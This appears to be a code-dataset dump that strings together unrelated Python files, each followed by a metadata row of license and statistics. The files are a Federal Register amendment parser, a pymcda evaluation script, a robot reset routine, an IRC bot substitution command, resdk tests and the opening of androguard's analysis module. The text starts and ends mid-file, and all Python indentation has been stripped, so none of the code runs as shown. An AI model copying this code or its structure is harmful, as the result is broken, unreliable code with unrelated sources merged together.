active=True, and_prefix=True)):
final_tokens.append(tokens.Verb(tokens.Verb.DELETE, active=True))
final_tokens.append(p1)
final_tokens.append(tokens.Verb(tokens.Verb.POST, active=True))
final_tokens.append(p2)
idx += 4
else:
final_tokens.append(tokenized[idx])
idx += 1
final_tokens.extend(tokenized[idx:])
return final_tokens
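# A sketch of the rewrite (token labels illustrative):
#   [MOVE(active), Paragraph A, Paragraph B, PUT(active, and_prefix)]
#   -> [DELETE(active), Paragraph A, POST(active), Paragraph B]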
def parse_amdpar(par, initial_context):
""" Parse the <AMDPAR> tags into a list of paragraphs that have changed.
"""
# Replace and "and"s in titles; they will throw off and_token_resolution
for e in filter(lambda e: e.text, par.xpath('./E')):
e.text = e.text.replace(' and ', ' ')
text = get_node_text(par, add_spaces=True)
tokenized = [t[0] for t, _, _ in amdpar.token_patterns.scanString(text)]
tokenized = compress_context_in_tokenlists(tokenized)
tokenized = resolve_confused_context(tokenized, initial_context)
tokenized = paragraph_in_context_moved(tokenized, initial_context)
tokenized = remove_false_deletes(tokenized, text)
tokenized = multiple_moves(tokenized)
tokenized = switch_passive(tokenized)
tokenized = and_token_resolution(tokenized)
tokenized, subpart = deal_with_subpart_adds(tokenized)
tokenized = context_to_paragraph(tokenized)
tokenized = move_then_modify(tokenized)
if not subpart:
tokenized = separate_tokenlist(tokenized)
initial_context = switch_context(tokenized, initial_context)
tokenized, final_context = compress_context(tokenized, initial_context)
amends = make_amendments(tokenized, subpart)
return amends, final_context
def multiple_moves(tokenized):
"""Phrases like paragraphs 1 and 2 are redesignated paragraphs 3 and 4
are replaced with Move(active), paragraph 1, paragraph 3, Move(active)
paragraph 2, paragraph 4"""
converted = []
skip = 0
for idx, el0 in enumerate(tokenized):
if skip:
skip -= 1
elif idx < len(tokenized) - 2:
el1, el2 = tokenized[idx+1:idx+3]
if (el0.match(tokens.TokenList) and el2.match(tokens.TokenList)
and el1.match(tokens.Verb, verb=tokens.Verb.MOVE,
active=False)
and len(el0.tokens) == len(el2.tokens)):
skip = 2
for tidx in range(len(el0.tokens)):
converted.append(el1.copy(active=True))
converted.append(el0.tokens[tidx])
converted.append(el2.tokens[tidx])
else:
converted.append(el0)
else:
converted.append(el0)
return converted
def switch_passive(tokenized):
"""Passive verbs are modifying the phrase before them rather than the
phrase following. For consistency, we flip the order of such verbs"""
if all(not t.match(tokens.Verb, active=False) for t in tokenized):
return tokenized
converted, remaining = [], tokenized
while remaining:
to_add = list(takewhile(
lambda t: not isinstance(t, tokens.Verb), remaining))
if len(to_add) < len(remaining):
# also take the verb
verb = remaining[len(to_add)].copy()
to_add.append(verb)
# switch verb to the beginning
if not verb.active:
to_add = to_add[-1:] + to_add[:-1]
verb.active = True
# may need to grab one more if the verb is move
if (verb.verb == tokens.Verb.MOVE
and len(to_add) < len(remaining)):
to_add.append(remaining[len(to_add)])
converted.extend(to_add)
remaining = remaining[len(to_add):]
return converted
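# e.g. "Paragraph (a) is revised" tokenizes roughly as
# [Paragraph, Verb(PUT, active=False)]; switch_passive flips it to
# [Verb(PUT, active=True), Paragraph] so amendments always read
# verb-first (labels illustrative).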
def resolve_confused_context(tokenized, initial_context):
"""Resolve situation where a Context thinks it is regtext, but it
*should* be an interpretation"""
if initial_context[1:2] == ['Interpretations']:
final_tokens = []
for token in tokenized:
if (token.match(tokens.Context, tokens.Paragraph)
and len(token.label) > 1 and token.label[1] is None):
final_tokens.append(token.copy(
label=[token.label[0], 'Interpretations', token.label[2],
'(' + ')('.join(l for l in token.label[3:] if l)
+ ')']))
elif (token.match(tokens.Context, tokens.Paragraph)
and len(token.label) > 1 and
token.label[1].startswith('Appendix:')):
final_tokens.append(token.copy(
label=[token.label[0], 'Interpretations',
token.label[1][len('Appendix:'):],
'(' + ')('.join(l for l in token.label[2:] if l)
+ ')']))
elif token.match(tokens.TokenList):
sub_tokens = resolve_confused_context(token.tokens,
initial_context)
final_tokens.append(token.copy(tokens=sub_tokens))
else:
final_tokens.append(token)
return final_tokens
else:
return tokenized
def and_token_resolution(tokenized):
"""Troublesome case where a Context should be a Paragraph, but the only
indicator is the presence of an "and" token afterwards. We'll likely
want to expand this step in the future, but for now, we only catch a few
cases"""
# compress "and" tokens
tokenized = zip(tokenized, tokenized[1:] + [None])
tokenized = [l for l, r in tokenized
if l != r or not l.match(tokens.AndToken)]
# we'll strip out all "and" tokens in just a moment, but as a first
# pass, remove all those preceded by a verb (which makes the following
# logic simpler).
tokenized = list(reversed(tokenized))
tokenized = zip(tokenized, tokenized[1:] + [None])
tokenized = list(reversed([l for l, r in tokenized
if not l.match(tokens.AndToken) or not r
or not r.match(tokens.Verb)]))
# check for the pattern in question
final_tokens = []
idx = 0
while idx < len(tokenized) - 3:
t1, t2, t3, t4 = tokenized[idx:idx + 4]
if (t1.match(tokens.Verb) and t2.match(tokens.Context)
and t3.match(tokens.AndToken)
and t4.match(tokens.Paragraph, tokens.TokenList)):
final_tokens.append(t1)
final_tokens.append(tokens.Paragraph(t2.label))
final_tokens.append(t4)
idx += 3 # not 4 as one will appear below
elif t1 != tokens.AndToken:
final_tokens.append(t1)
idx += 1
final_tokens.extend(tokenized[idx:])
return final_tokens
def context_to_paragraph(tokenized):
"""Generally, section numbers, subparts, etc. are good contextual clues,
but sometimes they are the object of manipulation."""
# Don't modify anything if there are already paragraphs or no verbs
for token in tokenized:
if isinstance(token, tokens.Paragraph):
return tokenized
elif (isinstance(token, tokens.TokenList) and
any(isinstance(t, tokens.Paragraph) for t in token.tokens)):
return tokenized
# copy
converted = list(tokenized)
verb_seen = False
for i in range(len(converted)):
token = converted[i]
if isinstance(token, tokens.Verb):
verb_seen = True
elif verb_seen and token.match(tokens.Context, certain=False):
converted[i] = tokens.Paragraph(token.label)
return converted
def is_designate_token(token):
""" This is a designate token """
return token.match(tokens.Verb, verb=tokens.Verb.DESIGNATE)
def contains_one_designate_token(tokenized):
""" Return True if the list of tokens contains only one designate token.
"""
designate_tokens = [t for t in tokenized if is_designate_token(t)]
return len(designate_tokens) == 1
def contains_one_tokenlist(tokenized):
""" Return True if the list of tokens contains only one TokenList """
tokens_lists = [t for t in tokenized if isinstance(t, tokens.TokenList)]
return len(tokens_lists) == 1
def contains_one_context(tokenized):
""" Returns True if the list of tokens contains only one Context. """
contexts = [t for t in tokenized if isinstance(t, tokens.Context)]
return len(contexts) == 1
def deal_with_subpart_adds(tokenized):
"""If we have a designate verb, and a token list, we're going to
change the context to a Paragraph. Because it's not a context, it's
part of the manipulation."""
# Ensure that we only have one of each: designate verb, a token list and
# a context
verb_exists = contains_one_designate_token(tokenized)
list_exists = contains_one_tokenlist(tokenized)
context_exists = contains_one_context(tokenized)
if verb_exists and list_exists and context_exists:
token_list = []
for token in tokenized:
if isinstance(token, tokens.Context):
token_list.append(tokens.Paragraph(token.label))
else:
token_list.append(token)
return token_list, True
else:
return tokenized, False
def separate_tokenlist(tokenized):
"""When we come across a token list, separate it out into individual
tokens"""
converted = []
for token in tokenized:
if isinstance(token, tokens.TokenList):
converted.extend(token.tokens)
else:
converted.append(token)
return converted
def compress(lhs_label, rhs_label):
"""Combine two labels where the rhs replaces the lhs. If the rhs is
    empty, assume the lhs takes precedence."""
if not rhs_label:
return lhs_label
label = list(lhs_label)
label.extend([None]*len(rhs_label))
label = label[:len(rhs_label)]
for i in range(len(rhs_label)):
label[i] = rhs_label[i] or label[i]
return label
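# A sketch of compress on hypothetical labels:
#   compress(['1005', '2', 'a'], ['1005', '3'])  -> ['1005', '3']
#   compress(['1005', '2'], [None, '4', 'i'])    -> ['1005', '4', 'i']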
def compress_context_in_tokenlists(tokenized):
"""Use compress (above) on elements within a tokenlist."""
final = []
for token in tokenized:
if token.match(tokens.TokenList):
subtokens = []
label_so_far = []
for subtoken in token.tokens:
if hasattr(subtoken, 'label'):
label_so_far = compress(label_so_far, subtoken.label)
subtokens.append(subtoken.copy(label=label_so_far))
else:
subtokens.append(subtoken)
final.append(token.copy(tokens=subtokens))
else:
final.append(token)
return final
def compress_context(tokenized, initial_context):
"""Add context to each of the paragraphs (removing context)"""
# copy
context = list(initial_context)
converted = []
for token in tokenized:
if isinstance(token, tokens.Context):
# Interpretations of appendices
if (len(context) > 1 and len(token.label) > 1
and context[1] == 'Interpretations'
and (token.label[1] or '').startswith('Appendix')):
context = compress(
context,
[token.label[0], None, token.label[1]] + token.label[2:])
else:
context = compress(context, token.label)
continue
        # Another corner case: a "paragraph" indicates interp context
elif (
isinstance(token, tokens.Paragraph) and len(context) > 1
and len(token.label) > 3 and context[1] == 'Interpretations'
and token.label[1] != 'Interpretations'):
context = compress(
context,
[token.label[0], None, token.label[2], '(' + ')('.join(
p for p in token.label[3:] if p) + ')'])
continue
elif isinstance(token, tokens.Paragraph):
context = compress(context, token.label)
token.label = context
converted.append(token)
return converted, context
def get_destination(tokenized, reg_part):
""" In a designate scenario, get the destination label. """
paragraphs = [t for t in tokenized if isinstance(t, tokens.Paragraph)]
destination = paragraphs[0]
if destination.label[0] is None:
# Sometimes the destination label doesn't know the reg part.
destination.label[0] = reg_part
destination = destination.label_text()
return destination
def handle_subpart_amendment(tokenized):
""" Handle the situation where a new subpart is designated. """
verb = tokens.Verb.DESIGNATE
token_lists = [t for t in tokenized if isinstance(t, tokens.TokenList)]
# There's only one token list of paragraphs, sections to be designated
tokens_to_be_designated = token_lists[0]
labels_to_be_designated = [t.label_text() for t in tokens_to_be_designated]
reg_part = tokens_to_be_designated.tokens[0].label[0]
destination = get_destination(tokenized, reg_part)
return DesignateAmendment(verb, labels_to_be_designated, destination)
class Amendment(object):
""" An Amendment object contains all the information necessary for
an amendment. """
TITLE = '[title]'
TEXT = '[text]'
HEADING = '[heading]'
def remove_intro(self, l):
""" Remove the marker that indicates this is a change to introductory
text. """
l = l.replace(self.TITLE, '').replace(self.TEXT, '')
return l.replace(self.HEADING, '')
def fix_interp_format(self, components):
"""Convert between the interp format of amendments and the normal,
node label format"""
if ['Interpretations'] == components[1:2]:
if len(components) > 2:
new_style = [components[0],
components[2].replace('Appendix:', '')]
# Add paragraphs
if len(components) > 3:
paragraphs = [p.strip('()')
for p in components[3].split(')(')]
paragraphs = filter(bool, paragraphs)
new_style.extend(paragraphs)
new_style.append(Node.INTERP_MARK)
# Add any paragraphs of the comment
new_style.extend(components[4:])
return new_style
else:
return components[:1] + [Node.INTERP_MARK]
return components
def fix_appendix_format(self, components):
"""Convert between the appendix format of amendments and the normal,
node label format"""
return [c.replace('Appendix:', '') for c in components]
def fix_label(self, label):
""" The labels that come back from parsing the list of amendments
are not the same type we use in the rest of parsing. Convert between
the two here (removing question markers, converting to interp
format, etc.)"""
def wanted(l):
return l != '?' and 'Subpart' not in l
components = label.split('-')
components = [self.remove_intro(l) for l in components if wanted(l)]
components = self.fix_interp_format(components)
components = self.fix_appendix_format(components)
return components
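    # A sketch of fix_label on hypothetical amendment labels:
    #   fix_label('200-?-2-a')                    -> ['200', '2', 'a']
    #   fix_label('200-Interpretations-2-(a)(1)')
    #       -> ['200', '2', 'a', '1', Node.INTERP_MARK]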
def __init__(self, action, label, destination=None):
self.action = action
self.original_label = label
self.label = self.fix_label(self.original_label)
if destination and '-' in destination:
self.destination = self.fix_interp_format(destination.split('-'))
else:
self.destination = destination
if self.TITLE in self.original_label:
self.field = self.TITLE
elif self.TEXT in self.original_label:
self.field = self.TEXT
elif self.HEADING in self.original_label:
self.field = self.HEADING
else:
self.field = None
def label_id(self):
""" Return the label id (dash delimited) for this label. """
return '-'.join(self.label)
def __repr__(self):
if self.destination:
return '(%s, %s, %s)' % (self.action, self.label, self.destination)
else:
return '(%s, %s)' % (self.action, self.label)
def __eq__(self, other):
return (isinstance(other, self.__class__)
and self.__dict__ == other.__dict__)
def __ne__(self, other):
return not self.__eq__(other)
class DesignateAmendment(Amendment):
""" A designate Amendment manages it's information a little differently
than a normal Amendment. Namely, there's more handling around Subparts."""
def __init__(self, action, label_list, destination):
self.action = action
self.original_labels = label_list
self.labels = [self.fix_label(l) for l in self.original_labels]
self.original_destination = destination
if 'Subpart' in destination and ':' in destination:
reg_part, subpart = self.original_destination.split('-')
_, subpart_letter = destination.split(':')
self.destination = [reg_part, 'Subpart', subpart_letter]
elif '-' in destination:
self.destination = self.fix_interp_format(destination.split('-'))
else:
self.destination = destination
def __repr__(self):
return "(%s, %s, %s)" % (
repr(self.action), repr(self.labels), repr(self.destination))
def make_amendments(tokenized, subpart=False):
"""Convert a sequence of (normalized) tokens into a list of amendments"""
verb = None
amends = []
if subpart:
amends.append(handle_subpart_amendment(tokenized))
else:
for i in range(len(tokenized)):
token = tokenized[i]
if isinstance(token, tokens.Verb):
assert token.active
verb = token.verb
elif isinstance(token, tokens.Paragraph):
if verb == tokens.Verb.MOVE:
if isinstance(tokenized[i-1], tokens.Paragraph):
origin = tokenized[i-1].label_text()
destination = token.label_text()
amends.append(Amendment(verb, origin, destination))
elif verb:
amends.append(Amendment(verb, token.label_text()))
# Edits to intro text should always be PUTs
for amend in amends:
if (not isinstance(amend, DesignateAmendment)
and amend.field == "[text]"
and amend.action == tokens.Verb.POST):
amend.action = tokens.Verb.PUT
return amends
def new_subpart_added(amendment):
""" Return True if label indicates that a new subpart was added """
new_subpart = amendment.action == 'POST'
label = amendment.original_label
m = [t for t, _, _ in amdpar.subpart_label.scanString(label)]
return (len(m) > 0 and new_subpart)
| cc0-1.0 | 1,316,664,245,820,526,000 | 37.28343 | 79 | 0.605642 | false | 3.93707 | false | false | false |
oso/pymcda | apps/display-confusion-table.py | 1 | 6419 | #!/usr/bin/env python
import os, sys
sys.path.insert(0, os.path.dirname(os.path.abspath(__file__)) + "/../")
import bz2
from xml.etree import ElementTree
from pymcda.electre_tri import MRSort
from pymcda.uta import AVFSort
from pymcda.types import PerformanceTable
from pymcda.types import AlternativesAssignments
from pymcda.types import AlternativePerformances
from pymcda.utils import compute_ca
from pymcda.utils import compute_confusion_matrix
from pymcda.utils import print_confusion_matrix
from pymcda.utils import print_pt_and_assignments
from pymcda.ui.graphic import display_electre_tri_models
from test_utils import is_bz2_file
f = sys.argv[1]
if not os.path.isfile(f):
print("Invalid file %s" % f)
sys.exit(1)
if is_bz2_file(f) is True:
f = bz2.BZ2File(f)
tree = ElementTree.parse(f)
root = tree.getroot()
try:
pt_learning = PerformanceTable().from_xmcda(root, 'learning_set')
except:
pt_learning = None
try:
pt_test = PerformanceTable().from_xmcda(root, 'test_set')
except:
pt_test = None
aa_learning_m1, aa_learning_m2 = None, None
aa_test_m1, aa_test_m2 = None, None
if root.find("ElectreTri[@id='initial']") is not None:
m1 = MRSort().from_xmcda(root, 'initial')
if pt_learning is not None:
aa_learning_m1 = m1.pessimist(pt_learning)
if pt_test is not None:
aa_test_m1 = m1.pessimist(pt_test)
elif root.find("AVFSort[@id='initial']") is not None:
m1 = AVFSort().from_xmcda(root, 'initial')
if pt_learning is not None:
aa_learning_m1 = m1.get_assignments(pt_learning)
if pt_test is not None:
aa_test_m1 = m1.get_assignments(pt_test)
else:
if root.find("alternativesAffectations[@id='learning_set']") is not None:
aa_learning_m1 = AlternativesAssignments().from_xmcda(root,
'learning_set')
if root.find("alternativesAffectations[@id='test_set']") is not None:
aa_test_m1 = AlternativesAssignments().from_xmcda(root, 'test_set')
if root.find("ElectreTri[@id='learned']") is not None:
m2 = MRSort().from_xmcda(root, 'learned')
if pt_learning is not None:
aa_learning_m2 = m2.pessimist(pt_learning)
if pt_test is not None:
aa_test_m2 = m2.pessimist(pt_test)
elif root.find("AVFSort[@id='learned']") is not None:
m2 = AVFSort().from_xmcda(root, 'learned')
if pt_learning is not None:
aa_learning_m2 = m2.get_assignments(pt_learning)
aids = []
from pymcda.utils import print_pt_and_assignments
for aid in aa_learning_m2.keys():
        aids.append(aid)
au = m2.global_utilities(pt_learning)
print_pt_and_assignments(aids, None, [aa_learning_m1, aa_learning_m2], pt_learning, au)
# for i in range(1, len(pt_learning) + 1):
# aid = "a%d" % i
# uti = m2.global_utility(pt_learning["a%d" % i])
# if aa_learning_m2[aid].category_id != aa_learning_m1[aid].category_id:
# print("%s %g %s %s" % (aid, uti.value, aa_learning_m2[aid].category_id, aa_learning_m1[aid].category_id))
# print_pt_and_assignments(anok, c, [aa_learning_m1, aa_learning_m2], pt_learning)
if pt_test is not None:
aa_test_m2 = m2.get_assignments(pt_test)
def compute_auc_histo(aa):
pass
if aa_learning_m1 is not None:
ca_learning = compute_ca(aa_learning_m1, aa_learning_m2)
auc_learning = m2.auc(aa_learning_m1, pt_learning)
print("Learning set")
print("============")
print("CA : %g" % ca_learning)
print("AUC: %g" % auc_learning)
print("Confusion table:")
matrix = compute_confusion_matrix(aa_learning_m1, aa_learning_m2,
m2.categories)
print_confusion_matrix(matrix, m2.categories)
aids = [a.id for a in aa_learning_m1 \
if aa_learning_m1[a.id].category_id != aa_learning_m2[a.id].category_id]
if len(aids) > 0:
print("List of alternatives wrongly assigned:")
print_pt_and_assignments(aids, None, [aa_learning_m1, aa_learning_m2],
pt_learning)
if aa_test_m1 is not None and len(aa_test_m1) > 0:
ca_test = compute_ca(aa_test_m1, aa_test_m2)
auc_test = m2.auc(aa_test_m1, pt_test)
print("\n\nTest set")
print("========")
print("CA : %g" % ca_test)
print("AUC: %g" % auc_test)
print("Confusion table:")
matrix = compute_confusion_matrix(aa_test_m1, aa_test_m2, m2.categories)
print_confusion_matrix(matrix, m2.categories)
aids = [a.id for a in aa_test_m1 \
if aa_test_m1[a.id].category_id != aa_test_m2[a.id].category_id]
if len(aids) > 0:
print("List of alternatives wrongly assigned:")
print_pt_and_assignments(aids, None, [aa_test_m1, aa_test_m2],
pt_test)
if type(m2) == MRSort:
worst = AlternativePerformances('worst', {c.id: 0 for c in m2.criteria})
best = AlternativePerformances('best', {c.id: 1 for c in m2.criteria})
categories = m2.categories
a_learning = aa_learning_m1.keys()
pt_learning_ok = []
pt_learning_too_low = []
pt_learning_too_high = []
for a in a_learning:
i1 = categories.index(aa_learning_m1[a].category_id)
i2 = categories.index(aa_learning_m2[a].category_id)
if i1 == i2:
pt_learning_ok.append(pt_learning[a])
elif i1 < i2:
pt_learning_too_high.append(pt_learning[a])
elif i1 > i2:
pt_learning_too_low.append(pt_learning[a])
a_test = aa_test_m1.keys()
pt_test_ok = []
pt_test_too_low = []
pt_test_too_high = []
for a in a_test:
i1 = categories.index(aa_test_m1[a].category_id)
i2 = categories.index(aa_test_m2[a].category_id)
if i1 == i2:
pt_test_ok.append(pt_test[a])
elif i1 < i2:
pt_test_too_high.append(pt_test[a])
elif i1 > i2:
pt_test_too_low.append(pt_test[a])
display_electre_tri_models([m2, m2], [worst, worst], [best, best],
[m2.vpt, m2.vpt],
[pt_learning_too_low, pt_test_too_low],
None,
[pt_learning_too_high, pt_test_too_high])
| gpl-3.0 | 691,970,308,955,988,100 | 36.538012 | 122 | 0.606481 | false | 2.947199 | true | false | false |
google-research/robel | robel/dkitty/utils/manual_reset.py | 1 | 3903 | # Copyright 2019 The ROBEL Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Hardware reset functions for the D'Kitty."""
import time
from robel.components.builder import ComponentBuilder
from robel.components.robot import RobotComponentBuilder
from robel.components.robot.dynamixel_robot import DynamixelRobotComponent
from robel.components.tracking import TrackerComponentBuilder
from robel.components.tracking.tracker import TrackerComponent
from robel.utils.reset_procedure import ResetProcedure
class ManualAutoDKittyResetProcedure(ResetProcedure):
"""Manual reset procedure for D'Kitty.
This waits until the D'Kitty is placed upright and automatically starts the
episode.
"""
def __init__(self,
upright_threshold: float = 0.9,
max_height: float = 0.35,
min_successful_checks: int = 5,
check_interval_sec: float = 0.1,
print_interval_sec: float = 1.0,
episode_start_delay_sec: float = 1.0):
super().__init__()
self._upright_threshold = upright_threshold
self._max_height = max_height
self._min_successful_checks = min_successful_checks
self._check_interval_sec = check_interval_sec
self._print_interval_sec = print_interval_sec
self._episode_start_delay_sec = episode_start_delay_sec
self._last_print_time = 0
self._robot = None
self._tracker = None
def configure_reset_groups(self, builder: ComponentBuilder):
"""Configures the component groups needed for reset."""
if isinstance(builder, RobotComponentBuilder):
assert 'dkitty' in builder.group_configs
elif isinstance(builder, TrackerComponentBuilder):
assert 'torso' in builder.group_configs
def reset(self, robot: DynamixelRobotComponent, tracker: TrackerComponent):
"""Performs the reset procedure."""
self._robot = robot
self._tracker = tracker
def finish(self):
"""Called when the reset is complete."""
# Wait until the robot is sufficiently upright.
self._wait_until_upright()
def _wait_until_upright(self):
"""Waits until the D'Kitty is upright."""
upright_checks = 0
self._last_print_time = 0 # Start at 0 so print happens first time.
while True:
if self._is_dkitty_upright():
upright_checks += 1
else:
upright_checks = 0
if upright_checks > self._min_successful_checks:
break
time.sleep(self._check_interval_sec)
print('Reset complete, starting episode...')
time.sleep(self._episode_start_delay_sec)
def _is_dkitty_upright(self) -> bool:
"""Checks if the D'Kitty is currently upright."""
state = self._tracker.get_state('torso')
height = state.pos[2]
upright = state.rot[2, 2]
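        # rot[2, 2] is the z-component of the torso z-axis in the world
        # frame: ~1.0 when upright, ~0 when the robot is on its side
        # (interpretation assumed from the tracker's rotation matrix).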
cur_time = time.time()
if cur_time - self._last_print_time >= self._print_interval_sec:
self._last_print_time = cur_time
print(('Waiting for D\'Kitty to be upright (upright: {:.2f}, '
'height: {:.2f})').format(upright, height))
if upright < self._upright_threshold:
return False
if height > self._max_height:
return False
return True
| apache-2.0 | 7,082,934,502,937,618,000 | 37.643564 | 79 | 0.643351 | false | 4.082636 | false | false | false |
Heufneutje/PyMoronBot | Commands/Sub.py | 1 | 7071 | # -*- coding: utf-8 -*-
"""
Created on Feb 28, 2015
@author: Tyranic-Moron
"""
import re
from IRCMessage import IRCMessage
from IRCResponse import IRCResponse, ResponseType
from CommandInterface import CommandInterface
from twisted.words.protocols.irc import assembleFormattedText, attributes as A
class UnbalancedBracesException(Exception):
def __init__(self, message, column):
# Call the base exception constructor with the params it needs
super(UnbalancedBracesException, self).__init__(message)
# Store the column position of the unbalanced brace
self.column = column
class DictMergeError(Exception):
pass
class Sub(CommandInterface):
triggers = ['sub']
help = "sub <text> - executes nested commands in <text> and replaces the commands with their output\n" \
"syntax: text {command params} more text {command {command params} {command params}}\n" \
"example: .sub Some {rainbow magical} {flip topsy-turvy} text"
runInThread = True
def execute(self, message):
"""
@type message: IRCMessage
"""
subString = self._mangleEscapes(message.Parameters)
try:
segments = list(self._parseSubcommandTree(subString))
except UnbalancedBracesException as e:
red = assembleFormattedText(A.fg.lightRed[''])
normal = assembleFormattedText(A.normal[''])
error = subString[:e.column] + red + subString[e.column] + normal + subString[e.column+1:]
error = self._unmangleEscapes(error, False)
return [IRCResponse(ResponseType.Say, u"Sub Error: {}".format(e.message), message.ReplyTo),
IRCResponse(ResponseType.Say, error, message.ReplyTo)]
prevLevel = -1
responseStack = []
extraVars = {}
metadata = {}
for segment in segments:
(level, command, start, end) = segment
# We've finished executing subcommands at the previous depth,
# so replace subcommands with their output at the current depth
if level < prevLevel:
command = self._substituteResponses(command, responseStack, level, extraVars, start)
# Replace any extraVars in the command
for var, value in extraVars.iteritems():
command = re.sub(ur'\$\b{}\b'.format(re.escape(var)), u'{}'.format(value), command)
# Build a new message out of this segment
inputMessage = IRCMessage(message.Type, message.User.String, message.Channel,
self.bot.commandChar + command.lstrip(),
self.bot,
metadata=metadata)
# Execute the constructed message
if inputMessage.Command.lower() in self.bot.moduleHandler.mappedTriggers:
response = self.bot.moduleHandler.mappedTriggers[inputMessage.Command.lower()].execute(inputMessage)
"""@type : IRCResponse"""
else:
return IRCResponse(ResponseType.Say,
u"'{}' is not a recognized command trigger".format(inputMessage.Command),
message.ReplyTo)
# Push the response onto the stack
responseStack.append((level, response.Response, start, end))
# Update the extraVars dict
extraVars.update(response.ExtraVars)
metadata = self._recursiveMerge(metadata, response.Metadata)
prevLevel = level
responseString = self._substituteResponses(subString, responseStack, -1, extraVars, -1)
responseString = self._unmangleEscapes(responseString)
return IRCResponse(ResponseType.Say, responseString, message.ReplyTo, extraVars=extraVars, metadata=metadata)
@staticmethod
def _parseSubcommandTree(string):
"""Parse braced segments in string as tuples (level, contents, start index, end index)."""
stack = []
for i, c in enumerate(string):
if c == '{':
stack.append(i)
elif c == '}':
if stack:
start = stack.pop()
yield (len(stack), string[start + 1: i], start, i)
else:
raise UnbalancedBracesException(u"unbalanced closing brace", i)
if stack:
start = stack.pop()
raise UnbalancedBracesException(u"unbalanced opening brace", start)
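    # A sketch of the generator's output (0-based offsets into the
    # input; the input string is hypothetical):
    #   list(Sub._parseSubcommandTree(u"a {b {c}} d"))
    #   -> [(1, u'c', 5, 7), (0, u'b {c}', 2, 8)]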
@staticmethod
def _substituteResponses(command, responseStack, commandLevel, extraVars, start):
# Pop responses off the stack and replace the subcommand that generated them
while len(responseStack) > 0:
level, responseString, rStart, rEnd = responseStack.pop()
if level <= commandLevel:
responseStack.append((level, responseString, rStart, rEnd))
break
cStart = rStart - start - 1
cEnd = rEnd - start
# Replace the subcommand with its output
command = command[:cStart] + responseString + command[cEnd:]
# Replace any extraVars generated by functions
for var, value in extraVars.iteritems():
command = re.sub(ur'\$\b{}\b'.format(re.escape(var)), u'{}'.format(value), command)
return command
@staticmethod
def _mangleEscapes(string):
# Replace escaped left and right braces with something that should never show up in messages/responses
string = re.sub(ur'(?<!\\)\\\{', u'@LB@', string)
string = re.sub(ur'(?<!\\)\\\}', u'@RB@', string)
return string
@staticmethod
def _unmangleEscapes(string, unescape=True):
if unescape:
# Replace the mangled escaped braces with unescaped braces
string = string.replace(u'@LB@', u'{')
string = string.replace(u'@RB@', u'}')
else:
# Just unmangle them, ie, keep the escapes
string = string.replace(u'@LB@', u'\\{')
string = string.replace(u'@RB@', u'\\}')
return string
def _recursiveMerge(self, d1, d2):
from collections import MutableMapping
'''
Update two dicts of dicts recursively,
if either mapping has leaves that are non-dicts,
the second's leaf overwrites the first's.
'''
for k, v in d1.iteritems():
if k in d2:
if all(isinstance(e, MutableMapping) for e in (v, d2[k])):
d2[k] = self._recursiveMerge(v, d2[k])
# we could further check types and merge as appropriate here.
elif isinstance(v, list):
# merge/append lists
if isinstance(d2[k], list):
# merge lists
v.extend(d2[k])
else:
# append to list
v.append(d2[k])
d3 = d1.copy()
d3.update(d2)
return d3
| mit | -4,750,790,059,631,187,000 | 39.872832 | 117 | 0.583652 | false | 4.441583 | false | false | false |
genialis/resolwe-bio-py | tests/unit/test_users.py | 1 | 1420 | """
Unit tests for resdk/resources/user.py file.
"""
import unittest
from mock import MagicMock
from resdk.resources.user import Group, User
class TestGroup(unittest.TestCase):
def setUp(self):
self.resolwe = MagicMock()
self.user = User(resolwe=self.resolwe, id=42)
self.group = Group(resolwe=self.resolwe, name="Test group", id=1)
self.group_no_id = Group(resolwe=self.resolwe, name="Test group")
def test_users_no_id(self):
with self.assertRaises(ValueError):
self.group_no_id.users
def test_users(self):
self.resolwe.user.filter.return_value = [self.user]
users = self.group.users
self.assertEqual(len(users), 1)
self.assertEqual(users[0], self.user)
def test_add_user_no_id(self):
with self.assertRaises(ValueError):
self.group_no_id.add_users(self.user)
def test_add_user(self):
self.group.add_users(self.user)
self.resolwe.api.group().add_users.post.assert_called_with({"user_ids": [42]})
def test_remove_user_no_id(self):
with self.assertRaises(ValueError):
self.group_no_id.remove_users(self.user)
def test_remove_user(self):
self.group.remove_users(self.user)
self.resolwe.api.group().remove_users.post.assert_called_with(
{"user_ids": [42]}
)
if __name__ == "__main__":
unittest.main()
| apache-2.0 | 5,720,585,394,346,826,000 | 26.843137 | 86 | 0.630986 | false | 3.364929 | true | false | false |
palaniyappanBala/androguard | androguard/core/analysis/analysis.py | 10 | 70640 | # This file is part of Androguard.
#
# Copyright (C) 2012, Anthony Desnos <desnos at t0t0.fr>
# All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import re, random, cPickle, collections
from androguard.core.androconf import error, warning, debug, is_ascii_problem,\
load_api_specific_resource_module
from androguard.core.bytecodes import dvm
from androguard.core.bytecodes.api_permissions import DVM_PERMISSIONS_BY_PERMISSION, DVM_PERMISSIONS_BY_ELEMENT
class ContextField(object):
def __init__(self, mode):
self.mode = mode
self.details = []
def set_details(self, details):
for i in details:
self.details.append( i )
class ContextMethod(object):
def __init__(self):
self.details = []
def set_details(self, details):
for i in details:
self.details.append( i )
class ExternalFM(object):
def __init__(self, class_name, name, descriptor):
self.class_name = class_name
self.name = name
self.descriptor = descriptor
def get_class_name(self):
return self.class_name
def get_name(self):
return self.name
def get_descriptor(self):
return self.descriptor
class ToString(object):
def __init__(self, tab):
self.__tab = tab
self.__re_tab = {}
for i in self.__tab:
self.__re_tab[i] = []
for j in self.__tab[i]:
self.__re_tab[i].append( re.compile( j ) )
self.__string = ""
def push(self, name):
for i in self.__tab:
for j in self.__re_tab[i]:
if j.match(name) != None:
if len(self.__string) > 0:
if i == 'O' and self.__string[-1] == 'O':
continue
self.__string += i
def get_string(self):
return self.__string
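    # A minimal usage sketch (the regex table is illustrative):
    #   ts = ToString({'O': ['invoke-.*'], 'I': ['if-.*']})
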